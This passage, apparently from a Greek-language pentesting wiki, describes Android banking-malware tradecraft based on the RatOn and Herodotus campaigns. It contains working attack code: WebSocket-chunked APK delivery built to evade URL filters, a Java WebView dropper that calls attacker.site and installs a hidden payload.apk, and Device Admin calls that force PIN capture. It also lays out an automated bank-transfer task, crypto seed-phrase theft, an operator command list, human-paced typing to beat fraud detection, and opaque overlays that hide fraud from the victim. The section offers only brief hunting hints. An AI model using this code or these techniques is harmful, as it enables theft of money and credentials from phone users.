// Accumulate binary chunks and drive fake Play progress UI const chunks = []; socket.on(“chunk”, (chunk) => chunks.push(chunk)); socket.on(“downloadProgress”, (p) => updateProgressBar(p));

// Assemble APK client‑side and trigger browser save dialog socket.on(“downloadComplete”, () => { const blob = new Blob(chunks, { type: “application/vnd.android.package-archive” }); const url = URL.createObjectURL(blob); const a = document.createElement(“a”); a.href = url; a.download = “app.apk”; a.style.display = “none”; document.body.appendChild(a); a.click(); });

</details>

Γιατί αποφεύγει απλούς ελέγχους:
- Δεν εκτίθεται στατικό APK URL· το payload ανασυντίθεται στη μνήμη από frames του WebSocket.
- Τα URL/MIME/extension φίλτρα που μπλοκάρουν απευθείας .apk απαντήσεις μπορεί να μην εντοπίσουν binary data που τούνελάρει μέσω WebSockets/Socket.IO.
- Οι crawlers και τα URL sandboxes που δεν εκτελούν WebSockets δεν θα ανακτήσουν το payload.

Δείτε επίσης WebSocket tradecraft και tooling:

<a class="content_ref" href="../../pentesting-web/websocket-attacks.md"><span class="content_ref_label">WebSocket Attacks</span></a>


## Android Accessibility/Overlay & Device Admin Abuse, ATS automation, and NFC relay orchestration – Μελέτη περίπτωσης RatOn

Η εκστρατεία RatOn banker/RAT (ThreatFabric) αποτελεί ένα συγκεκριμένο παράδειγμα του πώς οι σύγχρονες mobile phishing operations συνδυάζουν WebView droppers, Accessibility-driven UI automation, overlays/ransom, Device Admin coercion, Automated Transfer System (ATS), crypto wallet takeover, και ακόμη NFC-relay orchestration. Αυτή η ενότητα απομονώνει τις επαναχρησιμοποιήσιμες τεχνικές.

### Stage-1: WebView → native install bridge (dropper)
Οι επιτιθέμενοι παρουσιάζουν ένα WebView που δείχνει σε attacker page και ενσωματώνουν ένα JavaScript interface που εκθέτει έναν native installer. Ένα tap σε ένα HTML button καλεί native code που εγκαθιστά ένα second-stage APK bundled στα assets του dropper και στη συνέχεια το εκκινεί απευθείας.

Ελάχιστο μοτίβο:

<details>
<summary>Stage-1 dropper ελάχιστο μοτίβο (Java)</summary>
```java
public class DropperActivity extends Activity {
@Override protected void onCreate(Bundle b){
super.onCreate(b);
WebView wv = new WebView(this);
wv.getSettings().setJavaScriptEnabled(true);
wv.addJavascriptInterface(new Object(){
@android.webkit.JavascriptInterface
public void installApk(){
try {
PackageInstaller pi = getPackageManager().getPackageInstaller();
PackageInstaller.SessionParams p = new PackageInstaller.SessionParams(PackageInstaller.SessionParams.MODE_FULL_INSTALL);
int id = pi.createSession(p);
try (PackageInstaller.Session s = pi.openSession(id);
InputStream in = getAssets().open("payload.apk");
OutputStream out = s.openWrite("base.apk", 0, -1)){
byte[] buf = new byte[8192]; int r; while((r=in.read(buf))>0){ out.write(buf,0,r);} s.fsync(out);
}
PendingIntent status = PendingIntent.getBroadcast(this, 0, new Intent("com.evil.INSTALL_DONE"), PendingIntent.FLAG_UPDATE_CURRENT | PendingIntent.FLAG_IMMUTABLE);
pi.commit(id, status.getIntentSender());
} catch (Exception e) { /* log */ }
}
}, "bridge");
setContentView(wv);
wv.loadUrl("https://attacker.site/install.html");
}
}

HTML στη σελίδα:

<button onclick="bridge.installApk()">Install</button>

Μετά την εγκατάσταση, ο dropper εκκινεί το payload μέσω explicit package/activity:

Intent i = new Intent();
i.setClassName("com.stage2.core", "com.stage2.core.MainActivity");
startActivity(i);

Hunting idea: μη αξιόπιστες εφαρμογές που καλούν addJavascriptInterface() και εκθέτουν installer-like μεθόδους στο WebView; APK που περιλαμβάνει ενσωματωμένο secondary payload κάτω από assets/ και καλεί το Package Installer Session API.

Διαδικασία συναίνεσης: Accessibility + Device Admin + επακόλουθες runtime προτροπές

Το Stage-2 ανοίγει ένα WebView που φιλοξενεί μια σελίδα “Access”. Το κουμπί της καλεί μια exported μέθοδο που πλοηγεί το θύμα στις ρυθμίσεις Accessibility και ζητά την ενεργοποίηση της rogue υπηρεσίας. Μόλις παραχωρηθεί, το malware χρησιμοποιεί Accessibility για να κάνει αυτόματα κλικ μέσα από τις επόμενες runtime διαλόγους αδειών (contacts, overlay, manage system settings, κ.λπ.) και ζητά Device Admin.

• Το Accessibility προγραμματιστικά βοηθά στην αποδοχή μετέπειτα προτροπών εντοπίζοντας κουμπιά όπως “Allow”/“OK” στο node-tree και αποστέλλοντας κλικ.
• Έλεγχος/αίτημα άδειας Overlay:

if (!Settings.canDrawOverlays(ctx)) {
Intent i = new Intent(Settings.ACTION_MANAGE_OVERLAY_PERMISSION,
Uri.parse("package:" + ctx.getPackageName()));
ctx.startActivity(i);
}

Δείτε επίσης:

Accessibility Services Abuse

Overlay phishing/ransom via WebView

Οι χειριστές μπορούν να εκδίδουν εντολές για:

• να εμφανίσουν μια πλήρους οθόνης επικάλυψη από ένα URL, ή
• να περάσουν inline HTML που φορτώνεται σε επικάλυψη WebView.

Πιθανές χρήσεις: coercion (εισαγωγή PIN), άνοιγμα wallet για υποκλοπή των PINs, μηνύματα λύτρων. Κρατήστε μια εντολή για να βεβαιώνεστε ότι η άδεια επικάλυψης έχει χορηγηθεί αν λείπει.

Remote control model – text pseudo-screen + screen-cast

• Χαμηλό εύρος ζώνης: περιοδικά εξάγετε το Accessibility node tree, σειριοποιήστε τα εμφανιζόμενα κείμενα/ρόλους/όρια και στείλτε στο C2 ως ψευδο-οθόνη (εντολές όπως txt_screen μία φορά και screen_live συνεχώς).
• Υψηλή πιστότητα: ζητήστε MediaProjection και ξεκινήστε screen-casting/εγγραφή κατ’ απαίτηση (εντολές όπως display / record).

ATS playbook (bank app automation)

Δεδομένης μιας JSON εργασίας, ανοίξτε την εφαρμογή τράπεζας, οδηγήστε το UI μέσω Accessibility με ένα μείγμα ερωτημάτων κειμένου και taps σε συντεταγμένες, και εισάγετε το payment PIN του θύματος όταν ζητηθεί.

Παράδειγμα εργασίας:

{
"cmd": "transfer",
"receiver_address": "ACME s.r.o.",
"account": "123456789/0100",
"amount": "24500.00",
"name": "ACME"
}

Παραδείγματα κειμένων που εντοπίστηκαν σε μία ροή στόχου (CZ → EN):

• “Nová platba” → “Νέα πληρωμή”
• “Zadat platbu” → “Εισαγωγή πληρωμής”
• “Nový příjemce” → “Νέος παραλήπτης”
• “Domácí číslo účtu” → “Αριθμός εγχώριου λογαριασμού”
• “Další” → “Επόμενο”
• “Odeslat” → “Αποστολή”
• “Ano, pokračovat” → “Ναι, συνεχίστε”
• “Zaplatit” → “Πλήρωσε”
• “Hotovo” → “Ολοκληρώθηκε”

Οι χειριστές μπορούν επίσης να ελέγξουν/αυξήσουν τα όρια μεταφοράς μέσω εντολών όπως check_limit και limit που πλοηγούνται στο UI ορίων με παρόμοιο τρόπο.

Εξαγωγή φράσης ανάκτησης πορτοφολιού κρυπτονομισμάτων

Στόχοι όπως MetaMask, Trust Wallet, Blockchain.com, Phantom. Ροή: ξεκλείδωμα (κλεμμένο PIN ή παρεχόμενο password), πλοήγηση σε Security/Recovery, αποκάλυψη/εμφάνιση της φράσης ανάκτησης, keylog/exfiltrate it. Εφαρμόστε locale-aware selectors (EN/RU/CZ/SK) για σταθεροποίηση της πλοήγησης σε διαφορετικές γλώσσες.

Εξαναγκασμός Device Admin

Οι Device Admin APIs χρησιμοποιούνται για να αυξήσουν τις ευκαιρίες καταγραφής PIN και να δυσκολέψουν το θύμα:

• Άμεσο κλείδωμα:

dpm.lockNow();

• Λήξη του τρέχοντος διαπιστευτηρίου για να αναγκαστεί αλλαγή (Accessibility καταγράφει νέο PIN/password):

dpm.setPasswordExpirationTimeout(admin, 1L); // requires admin / often owner

• Εξαναγκάστε ξεκλείδωμα χωρίς βιομετρικά απενεργοποιώντας τις βιομετρικές δυνατότητες του keyguard:

dpm.setKeyguardDisabledFeatures(admin,
DevicePolicyManager.KEYGUARD_DISABLE_FINGERPRINT |
DevicePolicyManager.KEYGUARD_DISABLE_TRUST_AGENTS);

Σημείωση: Πολλοί DevicePolicyManager controls απαιτούν Device Owner/Profile Owner σε πρόσφατο Android· κάποιες OEM builds ενδέχεται να είναι πιο χαλαρές. Πάντοτε επαληθεύστε στο στοχευόμενο OS/OEM.

NFC relay orchestration (NFSkate)

Stage-3 μπορεί να εγκαταστήσει και να εκτελέσει ένα εξωτερικό NFC-relay module (π.χ. NFSkate) και ακόμη να του παραδώσει ένα HTML template για να καθοδηγήσει το θύμα κατά τη διάρκεια του relay. Αυτό επιτρέπει contactless card-present cash-out παράλληλα με online ATS.

Ιστορικό: NFSkate NFC relay.

Σετ εντολών χειριστή (παράδειγμα)

• UI/κατάσταση: txt_screen, screen_live, display, record
• Κοινωνικά: send_push, Facebook, WhatsApp
• Overlays: overlay (inline HTML), block (URL), block_off, access_tint
• Wallets: metamask, trust, blockchain, phantom
• ATS: transfer, check_limit, limit
• Συσκευή: lock, expire_password, disable_keyguard, home, back, recents, power, touch, swipe, keypad, tint, sound_mode, set_sound
• Comms/Recon: update_device, send_sms, replace_buffer, get_name, add_contact
• NFC: nfs, nfs_inject

Αντι-ανίχνευση ATS μέσω Accessibility: ανθρώπινος ρυθμός κειμένου και διπλή ένεση κειμένου (Herodotus)

Οι threat actors συνδυάζουν όλο και περισσότερο αυτοματοποίηση που αξιοποιεί Accessibility με αντι-ανίχνευση προσαρμοσμένη σε βασικά βιομετρικά συμπεριφοράς. Ένας πρόσφατος banker/RAT δείχνει δύο συμπληρωματικούς τρόπους παράδοσης κειμένου και έναν toggle για τον χειριστή ώστε να προσομοιώνει ανθρώπινη πληκτρολόγηση με τυχαίο ρυθμό.

• Λειτουργία ανίχνευσης: απαρίθμηση ορατών nodes με selectors και bounds για ακριβή στόχευση inputs (ID, text, contentDescription, hint, bounds) πριν από την ενέργεια.
• Διπλή ένεση κειμένου:
  • Mode 1 – ACTION_SET_TEXT απευθείας στον target node (σταθερό, χωρίς keyboard);
  • Mode 2 – clipboard set + ACTION_PASTE στο focused node (λειτουργεί όταν το direct setText είναι μπλοκαρισμένο).
• Ανθρώπινος ρυθμός: διαχωρίστε το string που δίνει ο χειριστής και παραδώστε το χαρακτήρα-προς-χαρακτήρα με τυχαίες καθυστερήσεις 300–3000 ms μεταξύ γεγονότων για να αποφύγετε heuristics «machine-speed typing». Υλοποιείται είτε προοδευτικά αυξάνοντας την τιμή μέσω ACTION_SET_TEXT, είτε επικολλώντας έναν χαρακτήρα κάθε φορά.

</details>

Επικαλύψεις μπλοκαρίσματος για κάλυψη απάτης:
- Απεικονίστε μια πλήρους οθόνης `TYPE_ACCESSIBILITY_OVERLAY` με διαφάνεια που ελέγχεται από τον χειριστή· κρατήστε την αδιαφανή για το θύμα ενώ η απομακρυσμένη αυτοματοποίηση εκτελείται από κάτω.
- Συνήθως εκτεθειμένες εντολές: `opacityOverlay <0..255>`, `sendOverlayLoading <html/url>`, `removeOverlay`.

Ελάχιστη επικάλυψη με ρυθμιζόμενο alpha:
```java
View v = makeOverlayView(ctx); v.setAlpha(0.92f); // 0..1
WindowManager.LayoutParams lp = new WindowManager.LayoutParams(
MATCH_PARENT, MATCH_PARENT,
WindowManager.LayoutParams.TYPE_ACCESSIBILITY_OVERLAY,
WindowManager.LayoutParams.FLAG_NOT_FOCUSABLE |
WindowManager.LayoutParams.FLAG_NOT_TOUCH_MODAL,
PixelFormat.TRANSLUCENT);
wm.addView(v, lp);